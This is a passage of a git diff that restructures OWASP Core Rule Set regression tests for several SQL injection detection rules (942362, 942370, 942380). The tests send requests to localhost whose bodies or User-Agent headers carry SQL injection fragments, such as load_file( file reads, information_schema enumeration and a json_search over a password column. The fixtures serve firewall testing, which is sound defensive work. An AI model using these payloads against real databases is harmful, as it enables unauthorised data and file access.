User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 15 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS t FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "! As' from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 30 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_id: 31 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_id: 32 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942362" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942362" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index a071e20b2..b351ecc2a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -6,11 +6,9 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. - If you know what a particular expression is supposed to catch, please revise the associated test. - enabled: true - name: 942370.yaml + If you know what a particular expression is supposed to catch, please revise the associated test.rule_id: 942370 tests: - - test_title: 942370-1 + - test_id: 1 desc: | [\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d @@ -19,93 +17,88 @@ tests: [\"'`]\s*?\*.+between\W*?[\"'`]\d [\"'`]\s*?\*.+and\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 or '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 2 desc: | [\"'`]\s*?\*.+id\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 id '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 3 desc: | [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' = # '" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' = # '" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 4 desc: | [^\w\s]+\s*?[\W\d].*?# stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' ? # = #" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 5 desc: | [^\w\s]+\s*?[\W\d].*?-- stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='? # = --" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='? # = --" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 6 desc: | [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d @@ -114,102 +107,96 @@ tests: [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' or homer 9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 7 desc: | \^[\"'`] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=^'" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=^'" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 8 desc: | [\"'`].*?\*\s*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"` * 12344" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 9 desc: | [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=>foo##'." - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=>foo##'." + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 10 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_id: 11 desc: encode(lo_get(16400),'base64')::int stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16400),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942370" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index d229d33f4..f28a16c3d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -2,771 +2,724 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942380.yaml tests: - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-5 